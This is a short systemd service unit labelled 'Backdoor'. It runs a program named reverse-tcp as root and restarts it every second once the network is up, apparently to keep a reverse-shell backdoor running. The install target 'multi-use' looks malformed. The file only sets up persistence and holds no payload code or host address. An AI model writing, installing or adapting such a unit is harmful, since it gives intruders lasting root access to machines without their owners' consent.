[Unit]
Description=Backdoor
After=network.target

[Service]
ExecStart=/usr/sbin/reverse-tcp
Restart=always
RestartSec=1
Type=simple
User=root

[Install]
WantedBy=multi-use
